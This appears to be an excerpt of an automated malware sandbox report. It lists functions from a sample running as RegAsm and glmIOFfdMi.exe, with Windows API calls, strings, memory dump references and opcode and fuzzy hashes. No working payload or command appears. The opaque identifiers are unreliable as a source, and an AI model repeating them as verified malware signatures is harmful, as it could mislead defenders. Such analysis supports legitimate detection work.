Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: a79f5b4871ba1c4f54388a69458767bdf475af3fdf68469de367ee09879fad86
Instruction ID: f9bd5592f4a27906ba0b7000611c056f456b6c13901b9127fc06cc884ae94f8f
Opcode Fuzzy Hash: a79f5b4871ba1c4f54388a69458767bdf475af3fdf68469de367ee09879fad86
Instruction Fuzzy Hash: 63E04F31540268BBCF122F61DC04EEE3F19FF85761F064026FC1566261CB7A9D61AA9D

Function 00407C63 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00007C6F,00407287), ref: 00407C68

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 91f082824127807ca67e9bea16e4e1142dcaa675fdc02378074aa91e014118a9
Instruction ID: 0ff61591fe6e7fdbf664e27eab8a47433d3f920744837751a1e33914f5cec1be
Opcode Fuzzy Hash: 91f082824127807ca67e9bea16e4e1142dcaa675fdc02378074aa91e014118a9
Instruction Fuzzy Hash:

Function 0041EFD8 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0041EFD8

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 960917853a08cbcbaec74a3857df259023f2eba71cc87e2cdee0c8228e0b7f47
Instruction ID: d5d072ba9748c195f736b78e16f2f5f2af1f06de213b616d404cea10f9c51eb0
Opcode Fuzzy Hash: 960917853a08cbcbaec74a3857df259023f2eba71cc87e2cdee0c8228e0b7f47
Instruction Fuzzy Hash: 01A02230300280CF83808F32AE0CB0C3FF8AE082E0B0AC03AA000C80B0EF3080A0AF08

Function 0041914C Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa0ba1e5d9a22f7c6db1b863d068fd7604d8ca8b2c2046f773a74d09f23aaf89
Instruction ID: ed00e364353b2709b8c4936f7de79ec0fff9d1aa87bc6e08b7c0caa285f9e44e
Opcode Fuzzy Hash: fa0ba1e5d9a22f7c6db1b863d068fd7604d8ca8b2c2046f773a74d09f23aaf89
Instruction Fuzzy Hash: 73E04632911268EBCB18DB89C95898AB2ACEB44B04B15009AF902D3210C274DE80C7D4

Function 004114A6 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eafc9afbd71d0c63c25bd700d152b00fba6a1b79f89aedc9458559ba3c3e83a7
Instruction ID: 9d670eee6a7ff43784672fcc557034ad53df9d6dcb31fc26035e34de67efaf71
Opcode Fuzzy Hash: eafc9afbd71d0c63c25bd700d152b00fba6a1b79f89aedc9458559ba3c3e83a7
Instruction Fuzzy Hash: 6EC08C3420098046CF29CE10C2713EA33D5A392B82F80098ECA0A0F752CA1E9CC2DA44

Function 00422D42 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0042485F), ref: 00422D5B

Strings

asin, xrefs: 00422E88
exp, xrefs: 00422DDA, 00422E3F
sqrt, xrefs: 00422E9A
log, xrefs: 00422DB8, 00422DC7
acos, xrefs: 00422E91
log10, xrefs: 00422D9D, 00422DAC
pow, xrefs: 00422DF9, 00422EA3, 00422EF0

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 99bc9cc3bdd9136b520063792197f245364da15bbda7aca5a31b7bed04557963
Instruction ID: 541d14d2076966b173cd57405107be29c5c83d47e8039af315078564b0fddfcc
Opcode Fuzzy Hash: 99bc9cc3bdd9136b520063792197f245364da15bbda7aca5a31b7bed04557963
Instruction Fuzzy Hash: 76514371B0062AEBCB108F59FA4C1AEBBB0FB45304F924057D480A6354CBBD8925EB5E

Function 0040718A Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00407190
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0040719E
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 004071AF
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 004071C0

Strings

GetTempPath2W, xrefs: 004071B5
GetSystemTimePreciseAsFileTime, xrefs: 004071A4
kernel32.dll, xrefs: 0040718B
GetCurrentPackageId, xrefs: 00407198

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: 12cc8ab004fe47f31fffcbf58e36badd15f6e56e2ad587471c9b10d870eb8305
Instruction ID: 3afd18a413fbafaec0d1884410ec314f69904bb85606d66d63126fe90f125993
Opcode Fuzzy Hash: 12cc8ab004fe47f31fffcbf58e36badd15f6e56e2ad587471c9b10d870eb8305
Instruction Fuzzy Hash: 3CE0EC71749671AB83209F70BC0EDAA3AA4EE0971139205B2BD15D2361D6BC44559B9C

Function 00414301 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,DE622082,?,0041440E,004038E3,?,?,00000000), ref: 004143C2

Strings

ext-ms-, xrefs: 0041436C
api-ms-, xrefs: 00414358

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 86759f0994eafd6f84a6647c0fdf9b4e30a2247b6dec6dce197b99e7f52573c2
Instruction ID: 9d281342414512710d521e2bc5e8bd8d189b06f0c9bb1d1e4d3acc3ca9f27be4
Opcode Fuzzy Hash: 86759f0994eafd6f84a6647c0fdf9b4e30a2247b6dec6dce197b99e7f52573c2
Instruction Fuzzy Hash: 9E21F371B41219ABCB219B61AC41F9B77589F817B4F250222ED26A73C0D738ED42C6D8

Function 004114C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,DE622082,?,?,00000000,0042534E,000000FF,?,00411458,?,?,0041142C,00000016), ref: 004114FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041150F
FreeLibrary.KERNEL32(00000000,?,00000000,0042534E,000000FF,?,00411458,?,?,0041142C,00000016), ref: 00411531

Strings

mscoree.dll, xrefs: 004114F6
CorExitProcess, xrefs: 00411507

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 5db7edf03dd5c6a86733f78c3fc37fecd77a691f09511d684ccae05772ab5e40
Instruction ID: 91ec29eb5be505712193f20e889ba6035279a869843729da5c2c1c8d1a6e38dc
Opcode Fuzzy Hash: 5db7edf03dd5c6a86733f78c3fc37fecd77a691f09511d684ccae05772ab5e40
Instruction Fuzzy Hash: 5E018431A50625EBDB218F50DC09BAEB7F9FB44B11F400526F912A22A0DB789900CA58

Function 00422232 Relevance: 7.8, APIs: 5, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34dfbc0b19412f8332e2df089f070eab11bf50ad423d98e1f5d4bef1ead3c863
Instruction ID: 9d2747a7e5b70225cc448f1b3832819408a251e63c6cb1e4317f51345b07cf5e
Opcode Fuzzy Hash: 34dfbc0b19412f8332e2df089f070eab11bf50ad423d98e1f5d4bef1ead3c863
Instruction Fuzzy Hash: B9B1E870B00215BFDB11DF59D980BAE7BB1BF45304F94816AE401AB392C7B99D42CB69

Function 0040B772 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,0040B723,00000000,00000001,0043568C,?,?,?,0040B8C6,00000004,InitializeCriticalSectionEx,00427C38,InitializeCriticalSectionEx), ref: 0040B77F
GetLastError.KERNEL32(?,0040B723,00000000,00000001,0043568C,?,?,?,0040B8C6,00000004,InitializeCriticalSectionEx,00427C38,InitializeCriticalSectionEx,00000000,?,0040B67D), ref: 0040B789
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,0040A593), ref: 0040B7B1

Strings

api-ms-, xrefs: 0040B796

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 22226141dfb546a2f16a4bc61347b62053759e468ff986d8c484c8ccf3c75455
Instruction ID: 4a96934300341e5ece3864587fe3feae18b3ac400cb1fe2ce3454729e361f76d
Opcode Fuzzy Hash: 22226141dfb546a2f16a4bc61347b62053759e468ff986d8c484c8ccf3c75455
Instruction Fuzzy Hash: 29E01A30384208BBEF205B61EC06F5A3E64EB40B85F904031FB0DE91E1E775A9519ACC

Function 004164C2 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(DE622082,00000000,00000000,0040BDB8), ref: 00416525

Part of subcall function 0041B08B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419056,?,00000000,-00000008), ref: 0041B137

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00416780
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004167C8
GetLastError.KERNEL32 ref: 0041686B

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 82cd919ffc66cdbec26423ec8f462efebf3297e9721ada9a3fb481d80f0d1854
Instruction ID: 1bb8143dd65314e62236f50c93da9e0a6d801424c5e2e01ca8c3ea5794d6433d
Opcode Fuzzy Hash: 82cd919ffc66cdbec26423ec8f462efebf3297e9721ada9a3fb481d80f0d1854
Instruction Fuzzy Hash: 7DD158B5E002589FCB11DFA9D880AEDBBB5FF48304F19412AE856E7351D734E882CB58

Function 0041C43D Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0041C445

Part of subcall function 0041B08B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419056,?,00000000,-00000008), ref: 0041B137

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C47D
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C49D

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 4d096bac32b07df6f96bbfc29f435c2dddc1c3056e5e13fb52e26ce166ed4541
Instruction ID: cd346ceb72f841712861b774b6322b7d2f9c84398f992d5f92ec2fcb375f728e
Opcode Fuzzy Hash: 4d096bac32b07df6f96bbfc29f435c2dddc1c3056e5e13fb52e26ce166ed4541
Instruction Fuzzy Hash: 091104B2A48515BF672127B25CDACFF6D5CDE99398310402AF802D2102EE2CDD8285BD

Function 0040AD3D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0040AD62

Strings

MOC, xrefs: 0040AD74
RCC, xrefs: 0040AD7C

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 5b710ab2a9f474c2cc4afd51bace25907f511bb75432380764933eab186ad071
Instruction ID: a4c454b0bcb5eef0a2e58a0d06434270c6490fd8828ce8058ef1224e804d7477
Opcode Fuzzy Hash: 5b710ab2a9f474c2cc4afd51bace25907f511bb75432380764933eab186ad071
Instruction Fuzzy Hash: 4C416E71900209AFCF15DFA4CD81AEEBBB5FF48304F19846AF904B7291D3399960DB95

Function 00407420 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407DA8

Strings

#7@, xrefs: 00407E13
@SC, xrefs: 00407E8B

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID: #7@$@SC
API String ID: 2325560087-54278199
Opcode ID: be0408e9841c2604ed6c70be4b6810e12912a1b256ed321422f905974070e74f
Instruction ID: 0d92a2c854cdd6e88b4d1eeb56e5bf4da0bfe8ec24aca00867b110679a0b03e4
Opcode Fuzzy Hash: be0408e9841c2604ed6c70be4b6810e12912a1b256ed321422f905974070e74f
Instruction Fuzzy Hash: DA2107B4640A00DBD318CF15F9857943BF4BB68355FA0643AE9088B3B1D3B46485CF1E

Analysis Process: glmIOFfdMi.exePID: 6648, Parent PID: 6856COMMON

Executed Functions

Function 056C8D18 Relevance: 2.7, Strings: 1, Instructions: 1496COMMON

Download Yara Rule

Strings

4, xrefs: 056C9C68

Memory Dump Source

Source File: 00000006.00000002.378488387919.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56c0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: cdbf5e40cc1d1fadf123afa38f99b95068d8fec9750e11dda7b59d5a40a90a1b
Instruction ID: 1de52fde174898c6463127e11b5b92a02dc873f1a0b537977434a2f903672696
Opcode Fuzzy Hash: cdbf5e40cc1d1fadf123afa38f99b95068d8fec9750e11dda7b59d5a40a90a1b
Instruction Fuzzy Hash: AFE26334A00118CFDB25EFA5D955AAEBBF6FB88305F108199E81AAB754CB30ED45CF50

Function 056C9202 Relevance: 1.9, Strings: 1, Instructions: 696COMMON

Download Yara Rule

Strings

4, xrefs: 056C9C68

Memory Dump Source

Source File: 00000006.00000002.378488387919.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56c0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 77656c05854564fbd4e815669c81b577896409569059c7fa149276b12a1a88cb
Instruction ID: 458bc8e3a3fb1c276140f51563f3ed2a89b4537c670d2efca6f96ca53d19705b
Opcode Fuzzy Hash: 77656c05854564fbd4e815669c81b577896409569059c7fa149276b12a1a88cb
Instruction Fuzzy Hash: D5625430A00118CFDB25EFA5D955BBEBBB6FB88305F1081A9D51AAB758CB30AD41CF51

Function 01145530 Relevance: 1.9, Strings: 1, Instructions: 683COMMON

Download Yara Rule

Strings

Oi8(, xrefs: 01145742

Memory Dump Source

Source File: 00000006.00000002.378370947660.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1140000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID: Oi8(
API String ID: 0-2266985433
Opcode ID: 1e4b4f0ea2df0a36fb15fc5c281dd8a8e3006dc0bc3784321eb17b493334e25d
Instruction ID: 2006e29849d4e0fed32d1c8e0403e4952a40f94f0adbeaac35853b402829afb5
Opcode Fuzzy Hash: 1e4b4f0ea2df0a36fb15fc5c281dd8a8e3006dc0bc3784321eb17b493334e25d
Instruction Fuzzy Hash: 4B522635A00114DFDB59DFA8C984E69BBB2FF89714F1681A8E149AB272DB31EC51CF40

Function 075DACD2 Relevance: 1.6, Strings: 1, Instructions: 329COMMON

Download Yara Rule

Strings

A, xrefs: 075DAE41

Memory Dump Source

Source File: 00000006.00000002.378533200372.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_75d0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: 2f8fc771bd18f182aab6aed4a34e1bd27d1fd4cb77b73bf42991bc586cd1cd3f
Instruction ID: 574e8633b8799d367dab362298f66095b46a0ea05be406590826631bb6ba2fbf
Opcode Fuzzy Hash: 2f8fc771bd18f182aab6aed4a34e1bd27d1fd4cb77b73bf42991bc586cd1cd3f
Instruction Fuzzy Hash: C3D18CB0A14205CFDB24DBA8D944BEEBBB3FF89314F14C56AD006AB259D7349C46CB91

Function 057CF752 Relevance: 1.5, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

Eho, xrefs: 057CFBEF

Memory Dump Source

Source File: 00000006.00000002.378492971012.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_57c0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID: Eho
API String ID: 0-757584699
Opcode ID: 9090f7ad2ad53f9b008bbf0bd3a5dc937e09f1d3689286792c7c3baa028a0e79
Instruction ID: c3c074f2f38e86dfd71901fa4fdbcf50b4a64bc32b5e479541e8291d77695894
Opcode Fuzzy Hash: 9090f7ad2ad53f9b008bbf0bd3a5dc937e09f1d3689286792c7c3baa028a0e79
Instruction Fuzzy Hash: D6D16D347001058FD765FF68D559A6A77F2EB98308F2182ADD819AB798DF30AD42CF81

Function 057CF75B Relevance: 1.5, Strings: 1, Instructions: 284COMMON

Download Yara Rule

Strings

Eho, xrefs: 057CFBEF

Memory Dump Source

Source File: 00000006.00000002.378492971012.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_57c0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID: Eho
API String ID: 0-757584699
Opcode ID: a4acf7b2bc87488b6247b8dda60a1ce48455976dddc1c75b05d2274ba74e74e9
Instruction ID: 0869eaf68d5cef2eede1018a96d0f90d10b343b978837e7edf57890dab34f497
Opcode Fuzzy Hash: a4acf7b2bc87488b6247b8dda60a1ce48455976dddc1c75b05d2274ba74e74e9
Instruction Fuzzy Hash: 33C16E307001158FD765FF68D559A6A77F2EB98308F2182ADD819AB798DF30AD42CF81

Function 057CF816 Relevance: 1.5, Strings: 1, Instructions: 244COMMON

Download Yara Rule

Strings

Eho, xrefs: 057CFBEF

Memory Dump Source

Source File: 00000006.00000002.378492971012.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_57c0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID: Eho
API String ID: 0-757584699
Opcode ID: 8f305e2fa67209aedca3fc1c65ce2ff9a6c5adec5edfeeadf11a97faa9fcad06
Instruction ID: d431d84006bfe8dcedc291e2f0bd6428663e63e08d988ff59ac14c477fdad01f
Opcode Fuzzy Hash: 8f305e2fa67209aedca3fc1c65ce2ff9a6c5adec5edfeeadf11a97faa9fcad06
Instruction Fuzzy Hash: A4B170347001058FD765FF68D559A6A77F2EB98308F1082ADD819AB799DF34AD42CF80

Function 057CD480 Relevance: 1.5, Instructions: 1490COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378492971012.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_57c0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc5c9c74d5421dc5fc8b3a011333bc4c439ecef90acf8328e357f59bb9247e1f
Instruction ID: 8abab76804649594ca86b1a9374024ac8201d5e45af8b0700d8d8a97ba08368b
Opcode Fuzzy Hash: fc5c9c74d5421dc5fc8b3a011333bc4c439ecef90acf8328e357f59bb9247e1f
Instruction Fuzzy Hash: 1DE2FF747000058FC769FF64D6A1F6A73F2BBA8708F5182AD941AAB798CB706D41CF85

Function 057CD470 Relevance: 1.5, Instructions: 1489COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378492971012.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_57c0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f68c927f8734d9541613cbe6ad9e4bab9fffb896020a134f16f546f801ebccd2
Instruction ID: 9e00968d79e38675497b2c40d99ed10f3d74fdb3f31f1be14482a4a9d01940cd
Opcode Fuzzy Hash: f68c927f8734d9541613cbe6ad9e4bab9fffb896020a134f16f546f801ebccd2
Instruction Fuzzy Hash: 8BE20F747000058FC769FF64D6A1F6A73F2BBA8708F5182AD941AAB798CB706D41CF85

Function 05D9C070 Relevance: .7, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378503448825.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5d90000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4287f2f17ab71a25eaebc3fece1be937240c0a788d13e256ae6d2c7999615692
Instruction ID: a0917bf47f6483489736ce0f1f168b98aa01376b4ecc34601d48a765fe171588
Opcode Fuzzy Hash: 4287f2f17ab71a25eaebc3fece1be937240c0a788d13e256ae6d2c7999615692
Instruction Fuzzy Hash: F4521675A101149FDB19DFA8C984EA9BBF2FF48314F1581A9E50AAB272CB31EC51CF50

Function 057E5CA0 Relevance: .5, Instructions: 503COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378494334830.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_57e0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 364c054c94ed810b654ac2ab622501f85ebd6a34e45d2c70520c5a5cc0dae5f6
Instruction ID: 0b791293b1ccd828d99069f972dd2d834658bd1cd7e084496659be775af811e9
Opcode Fuzzy Hash: 364c054c94ed810b654ac2ab622501f85ebd6a34e45d2c70520c5a5cc0dae5f6
Instruction Fuzzy Hash: 47126234B00208DFDB15FFA4D9989ADB7B2FB98304B60862DE816A7759DF309D45DB40

Function 05D9AC45 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378503448825.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5d90000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 874a86b960a31330b116683ea491639353466e75fb682ae09809148f67d28636
Instruction ID: 925520bb192c9da1d8f5aba93ea30b820fc454cea02c72553050591dca7a7a5c
Opcode Fuzzy Hash: 874a86b960a31330b116683ea491639353466e75fb682ae09809148f67d28636
Instruction Fuzzy Hash: 50120974A002198FCB54DF28D899A9DB7F2FF89300F5181EAD44AA7355DB34AE81CF81

Function 057C1750 Relevance: .4, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378492971012.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_57c0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc53b764321341c94a64ba53bec3aebf6b9784c34c42217aec2bfba3940d7054
Instruction ID: 62cd3325711be3dc78aa75d3984e8622870f8bb79220a47e4ed6d25b2cafdea6
Opcode Fuzzy Hash: dc53b764321341c94a64ba53bec3aebf6b9784c34c42217aec2bfba3940d7054
Instruction Fuzzy Hash: 8AF1DE34B10218EFDB15FBA4E998DAEBBB7FF98304F608129E81567758CA716C01DB40

Function 01141D30 Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378370947660.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1140000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d467207d9d0251e82077c9f889713443a90c9d9eb343ba63ccf8405f0928875
Instruction ID: 88523988097c4cb73b0a972ca48cbb58a77944911078827af99dcf51dd857321
Opcode Fuzzy Hash: 6d467207d9d0251e82077c9f889713443a90c9d9eb343ba63ccf8405f0928875
Instruction Fuzzy Hash: 4DD1F575A00210DFC719DF28D494AA9BBF2FF89714F1981A9E5119B3A1DB31EC42CF90

Function 0759D768 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378532071830.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7590000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 265bf2534c4c7664cb84eba1fa1221a73e01fb7a93a51adc122df9c874f27d28
Instruction ID: e8c496aee5be86672fcf489ef996a7419eef1b5ef104fc14995fa7c02852cd3c
Opcode Fuzzy Hash: 265bf2534c4c7664cb84eba1fa1221a73e01fb7a93a51adc122df9c874f27d28
Instruction Fuzzy Hash: 3DD136B0B10216CFEB18EB24D655BEE73B2BBC5304F508579D4069B799CB759C41CB82

Function 057EE920 Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378494334830.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_57e0000_glmIOFfdMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b965e861d1300ed039e19839fa0fdfcdb16d6e5efa6ff8d2a2baeafb24a1bc3e
Instruction ID: df014844000edaedeb56c71d4241cde3d38c3ca3065efa41d551df5e3c63f3fb
Opcode Fuzzy Hash: b965e861d1300ed039e19839fa0fdfcdb16d6e5efa6ff8d2a2baeafb24a1bc3e
Instruction Fuzzy Hash: 3AD19E34B00608DFCB15FF64D95896E7BB3EBA8308B50861DE816A7758DF349C02DB81

Function 057EE910 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.378494334830.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_57e0000_glmIOFfdMi.jbxd

Similarity
